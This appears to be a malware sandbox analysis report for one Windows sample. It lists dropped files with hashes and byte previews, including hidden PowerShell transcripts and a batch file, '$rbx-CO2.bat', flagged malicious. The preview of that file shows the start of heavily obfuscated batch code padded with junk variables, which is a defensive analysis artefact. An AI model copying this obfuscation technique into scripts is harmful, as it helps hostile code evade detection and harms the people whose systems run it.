Category:	dropped
Size (bytes):	8782
Entropy (8bit):	3.6959762702757173
Encrypted:	false
SSDEEP:	192:R6l7wVeJWMfY6YeRY6gmfZaP4pWEE89bfS8sfMVm:R6lXJVw6YYFgmfQPwfofz
MD5:	429C3655DB86FC5D632BCA554BD68B74
SHA1:	3DCB1437F73F7EB3758D2A5671A3C0A89EA23769
SHA-256:	87A0C3E6C8C1708DED1F242FCF73E74ACD6A8FE515738B2EAC82DCA6F2E89986
SHA-512:	35DAC13B861884E674C4564F014E3392248A9511E3FD3CE380AEE2FF5B5BCB2AE1BC15037616B048FDDCC14B784AA22D3B64D2DFDFD50772545E99E762BEF6DD
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.8.2.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER392B.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4777
Entropy (8bit):	4.436875741874379
Encrypted:	false
SSDEEP:	48:cvIwWl8zsSJg771I9fFyWpW8VYT0Ym8M4JQ9wSFRyq8vlw1ytfhd:uIjfgI7EF7VKBJQGSWu1ufhd
MD5:	2E7AF1C2D5455D8BD63955ADCD51D1CA
SHA1:	8E81343878DEF226DC1277F09E2F42D745B56CB4
SHA-256:	02C13AE00132915770DF9ABB6EC83AE10C4227FA42AFA44636E92FEB76CEAE3C
SHA-512:	9B4955C2C8DEB052381A230C2A5E694E7739EEFD910FEAD0BD45B1815C56E260A34017C444679CF7B096AEA750A1F93B89ABA2B4BF4CF8610629A2957D307BAE
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="528405" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER604E.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Oct 4 07:42:09 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	929658
Entropy (8bit):	3.461112606558634
Encrypted:	false
SSDEEP:	6144:JvM4JE70/iM52zie+wdfd3lD6P3cwI/Lq8jEKr3QGnpK0K:eM52zie+o3NA3Bcq8jEKrQGnp
MD5:	01906B17B4E0673452E66F364167027B
SHA1:	59C6FE188D94AA7562042052151AD5A0A039794F
SHA-256:	8694B873A8C186696BAD061EDB951963A4E95FEA77A0EBC2FB0E9B99BB66B9D1
SHA-512:	462923DB93CAE2F913C6BAF3B3185BADC93FA7CD4A192160B6B71FC962B205ECFFF80A2D0300DD6CEE0B385A8F532B7B07B9B17EC104248813081C00B873074F
Malicious:	false
Preview:	MDMP..a..... .......Q..f............T............'..h....... ;...3......T...............`.......8...........T...........`_..............4n.......... p..............................................................................eJ.......p......Lw......................T...........J..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6446.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8582
Entropy (8bit):	3.693509751945523
Encrypted:	false
SSDEEP:	192:R6l7wVeJf1L3O6YHD61gmfZaP4pWEM89bb1Psfpzpm:R6lXJtrO6Yj61gmfQPYbmfa
MD5:	2D0362889AB324F37447CE118E10AA1F
SHA1:	22404E67C9777467F4DF17B789448563D1366C5F
SHA-256:	6BCED54C544A05B0A5A033EECFD1CCC4E1D42122FEEF9C6EA48C15AACC8A1A81
SHA-512:	5C71E3757CFC1F8C59E0CDE020E18BBDD7EB3A8625B82E8EB31BA5B7E822CC9DEC83F673BCC23825790CCFD1401B8E36E2EB9E2CBAA8ABBF6031824B68EE946E
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.2.8.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6476.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4777
Entropy (8bit):	4.433221160182472
Encrypted:	false
SSDEEP:	48:cvIwWl8zsLtJg771I9fFyWpW8VYJ5Ym8M4JQ9wSFKLoyq8vlwOytfjd:uIjfLHI7EF7V6oJQGJMWuOufjd
MD5:	DFBAB05D482F5526D54EE52B5FB16057
SHA1:	E266952E1D8D6B1FAB0AD130B062969B5A1BDBCA
SHA-256:	248DE062EA64BD2AC8F0E6B81CCC293F4D885BFF18567FEBD1A001DD10FDA1DB
SHA-512:	6371C8494E79DE08F2333EF333C8D63FF22CC1CBFDEC986E5445655203CE2791AA2DE51AFCBF848E49C008B6E9ACE114DC399FE56A67FDCD395674B4CC3A57E9
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="528404" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	9713
Entropy (8bit):	4.940954773740904
Encrypted:	false
SSDEEP:	192:6xoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smu9:9rib4ZIkjh4iUxsNYW6Ypib47
MD5:	BA7C69EBE30EC7DA697D2772E36A746D
SHA1:	DA93AC7ADC6DE8CFFED4178E1F98F0D0590EA359
SHA-256:	CFCE399DF5BE3266219AA12FB6890C6EEFDA46D6279A0DD90E82A970149C5639
SHA-512:	E0AFE4DF389A060EFDACF5E78BA6419CECDFC674AA5F201C458D517C20CB50B70CD8A4EB23B18C0645BDC7E9F326CCC668E8BADE803DED41FCDA2AE1650B31E8
Malicious:	false
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2916
Entropy (8bit):	5.370813493058233
Encrypted:	false
SSDEEP:	48:4SaAzsSU4Yymdax4RIoUP7m9qr9t5/78NfpHcRDGx3axIZVEouNHJBVrH/jCB:taAzlHYv+IfB9qrh7KfpRjPEo2dL8
MD5:	D689C25F0EDEEC305A2F2409A351E182
SHA1:	BD5874971D56F1ED49E405FF4FAFD25F323BD41A
SHA-256:	29A8A13B5957E5011C76C9CF249DBB7B8110C1761401021B29D135B11232D097
SHA-512:	5FA6A8C21ED92F810CFCBC56A5741C25D7209EFC1E84BB3F8A4600D2F3BAB4FF45DCBAE8677D1943B7F2C8DC94A431890ACC6F5CF2F50911E36D80926BB21A34
Malicious:	false
Preview:	@...e...........................................................H..............@-....f.J.\|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.................0..~.J.R...L........System.Data.L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3bbo2kri.le0.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5qgxuuvs.0li.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b32b30w1.tgj.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r5r0ihk5.kzs.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_squa0cl3.qra.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uy1ul2eh.yqr.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\$nya-Logs\2024-10-04

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	DOS executable (COM, 0x8C-variant)
Category:	modified
Size (bytes):	352
Entropy (8bit):	7.415109904127954
Encrypted:	false
SSDEEP:	6:iAxVJnCsMCy4a66fS8D7EeYuzRZB4fUHs1+gG7iMn4R4jGmSpvh7cV+U:/c5CyFdPHPzF4fUHsAgGGMn4R4jTgJ1U
MD5:	FE5F105C5FE691A4724079A34C3FD002
SHA1:	607724412F46E8221F65C2869DF87E7CAA5D288A
SHA-256:	A6848E3050D90F07544F46CAE503C87A3A3D73E18858D2A60D7D1BF977955096
SHA-512:	12C60C98B656524FFD488839E5B3A8B594E553C95E0DC796782CAEEB8D86C0A8C75F9385B735DE22C8D78E2E38F0CC1BBDBB4D72AA83833A9641A51D6EAD032C
Malicious:	false
Preview:	.<....].q...w..6I+N..j......J.A}.. -..\|.J.........M..~bS%.&..E;I.Uf._G..:........\.T...._..aOl..^..Y8\|...g..&.-....Ys.....B.AI6......Sq..Qlp.#&...o...p...p.."...x.j.1C.P.0....4....+ea'..US[............a.....T.f.U_0...>...H...I.{7G..^..?.6.3.9i9....X...5...4..u...E.v:.....wb.7......qXj.nu.e),....t!,0..Q..."..+Mq\|p.....W6...+.C...pl...m.V

C:\Users\user\Documents\20241004\PowerShell_transcript.128757.CxMBvNgr.20241004034233.txt

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	4553
Entropy (8bit):	5.349222050408134
Encrypted:	false
SSDEEP:	96:BZtsZ+NTyyqo1ZhZ9sZ+NTyyqo1Z0povTueovTuuZMsZ+NTyyqo1ZppovTueovTV:0EBEK
MD5:	784CCEAD8246F1D9B0B0233774243374
SHA1:	05C1B6AB474713446F3310C5463A8BB5CD0FBD08
SHA-256:	94F81DCB3AA9BF4A2E7261F0735FBB15445C9F72AA3CDEE6E6D7006D898A7CA2
SHA-512:	093EC3633FDCCBAE61C3DEA292499ADBC9490DEFF9D134C5D19925D4BAE5E14690778FCD00D139B9BF27E46C475E417DB5C5A81D90D1F1EAF4EC442C3D12E7E7
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20241004034233..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 128757 (Microsoft Windows NT 10.0.19045.0)..Host Application: powershell.exe -WindowStyle Hidden..Process ID: 5216..PSVersion: 5.1.19041.1682..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1682..BuildVersion: 10.0.19041.1682..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..********************..Windows PowerShell transcript start..Start time: 20241004034303..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 128757 (Microsoft Windows NT 10.0.19045.0)..Host Application: powershell.exe -WindowStyle Hidden..Process ID: 5216..PSVersion: 5.1.19041.1682..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1682..BuildVersion: 10.0.19041.1

C:\Users\user\Documents\20241004\PowerShell_transcript.128757.UJcpkVmk.20241004034203.txt

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (2684), with CRLF line terminators
Category:	dropped
Size (bytes):	5117
Entropy (8bit):	5.637283607772319
Encrypted:	false
SSDEEP:	96:BZGsZ+NTryqo1ZhZOsZ+NTryqo1ZfpovTueovTukVt7vBpB6a5xY595f8bus3wMp:9E653b5xY595f7s3wMcjIiIIit
MD5:	141D50A8BBC12D18153D981E74F7421B
SHA1:	229EFFB65263021AA2609644FC85BC7DCC1886FD
SHA-256:	6BD9C223DF78316DB7E1C4D348D1B1C5E61CB97F0B01B9807C41AD3B34B3D59C
SHA-512:	DB76B41B4BCEB8FA968CD4E76FF426FC23E9110F6A2C0D1E0BDF32A0309B709E12DD2510C01D9EAAAD0E9B3FEC0FC9BF6AF365215835F98EAB796544D9C824F4
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20241004034203..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 128757 (Microsoft Windows NT 10.0.19045.0)..Host Application: powershell.exe -WindowStyle Hidden..Process ID: 1284..PSVersion: 5.1.19041.1682..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1682..BuildVersion: 10.0.19041.1682..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..********************..Windows PowerShell transcript start..Start time: 20241004034311..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 128757 (Microsoft Windows NT 10.0.19045.0)..Host Application: powershell.exe -WindowStyle Hidden..Process ID: 1284..PSVersion: 5.1.19041.1682..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1682..BuildVersion: 10.0.19041.1

C:\Users\user\Documents\20241004\PowerShell_transcript.128757.hSiBdkli.20241004034257.txt

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (2692), with CRLF line terminators
Category:	dropped
Size (bytes):	5125
Entropy (8bit):	5.642366220416972
Encrypted:	false
SSDEEP:	96:BZ/sZ+NTUyqo1ZhZNZsZ+NTUyqo1ZOpovTueovTuOVt7vBpB6a5xY595f8bus3wJ:5AEY53b5xY595f7s3wM5IiIIit
MD5:	3AD5707222C23F76FFDF0619C8AC6D25
SHA1:	453EA743B95692E13F665F8F0EC46B3BBBAA0C4D
SHA-256:	EBA01D3DF9AF7A904BB764BBA987782A74E2252D9F315D5EFFC6304FDB2E6288
SHA-512:	08A607B366A901B62CD32BE7DDC373CDC33ABFFA16BF3A90783C87B301DE2DA4F59B8F9E594BAE0FAC150CB409EE8A02DCEC178E850660F358FC45DFA999A677
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20241004034257..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 128757 (Microsoft Windows NT 10.0.19045.0)..Host Application: powershell.exe -WindowStyle Hidden..Process ID: 4828..PSVersion: 5.1.19041.1682..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1682..BuildVersion: 10.0.19041.1682..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..********************..Windows PowerShell transcript start..Start time: 20241004034327..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 128757 (Microsoft Windows NT 10.0.19045.0)..Host Application: powershell.exe -WindowStyle Hidden..Process ID: 4828..PSVersion: 5.1.19041.1682..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1682..BuildVersion: 10.0.19041.1

C:\Windows\$rbx-onimai2\$rbx-CO2.bat

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	DOS batch file, ASCII text, with very long lines (5674), with CRLF line terminators
Category:	dropped
Size (bytes):	5214429
Entropy (8bit):	6.008710946572079
Encrypted:	false
SSDEEP:	49152:9YFeyNRX+o9UIcbBIXu/DloMIZv/us2aFGKeXGuqzwIEqHL5l8M/CJs2:f
MD5:	19FC666F7494D78A55D6B50A0252C214
SHA1:	8876CD520507CBFDC2E89E449BABA52232A1DF1B
SHA-256:	E96F8F61E3AF77C429AE6AF54C128F7B8420A45A0A63BDFCACD682773B8E5FC1
SHA-512:	94DDE8D5D0100E892CA004556B30B8E8FEDACC1E3482DAB9D611BD64569B2F73E29DA93DB2C7AE51585791A4F39D01426EE6663C48602DE92AA74F6EBE3F630A
Malicious:	true
Preview:	@echo off..%^%@%KhlQYXcflBNlDRnjWyCtzUMbVdihsfHGoAGNTEJeLZNLqMbLlXPalwqPvjUVOUMfTgWclzprOxHzgaKicxWvpHuSkQsKJOpQnISjQYALHylNOQJuzMSrYqQlLdSuhFIahRmyiAsdWkORvHethXkXVYRWSGyNffDcPlGXEkmYtPvNCYPeZznkuLejZqGBcFYQHLck%%^%e%hPWLmDgCetTQtOGStIdgwXoEKVOREgRWEdRJqyhiYGVWNKJRrYodYeEjAsbrOpYYCWmpWWBUAVhPcsRZmXzGSNYAyIjYxQuJIWtQytUuwtCdXPgiBbfQPsgPYLQoND%%^%c%KAygfZaASdfjylUCJBawwLDTqQERMDGGSXRCzJbjAAmNKiHDdjhNMhaZXEPovjOowyrBurdazRWVyQjijaODwTTLWSFVTMOrMXrlRgiLfhnVkfAguHfuukSCEFECMihNdFjAzXrcScyoGYARryAlGtWBeOHlCGZWZzSF%%^%h%aHwqdBsMDWGeNlnHVgJJHvLqgAmcBpgfVUrReUDSDPARbgOvMpdsjVoEWgkCpqloPAjSTwDbCRfSUToZMRqmlOWZFNUYKaCnDmcBXVBqMcPrQwJdRkQyaZdbDjmgBEqBoSoIRNcQpZAiYEjjeRhzkdnEiaYNIuPhLndYialehajazVdYZdcKxRrlEJAQPohUkswKBlbdFcrjUmfm%%^%o%ZOFseJUWRtyzvoSSoPgytwOcYeuzhqsDnTPACCfIBNJRCEkNyqGwZODCZDtaouOBaVlBzsqLKxWFMWAuUGaQKVEzpmAYjfuhZiRHsIogaUMBRYQddYfIuXRfqMmmRrCEdPFEfSclsUQPjcIrwxVkZLNcrLqFwcoIshybslYkWUpzgcVodVQuvsFrcDntCwPqFixbDHYkzLnfvnWpPb%%^% %BmUmZChYPYEHAeZTXEULwWFVKezVPHYDAUndLWxzwIilUdNawt

C:\Windows\$rbx-onimai2\$rbx-CO2.bat:Zone.Identifier

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\System32\20241004\PowerShell_transcript.128757.tvTEgCNQ.20241004034311.txt

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (5360), with CRLF line terminators
Category:	dropped
Size (bytes):	11484
Entropy (8bit):	5.34259826985146
Encrypted:	false
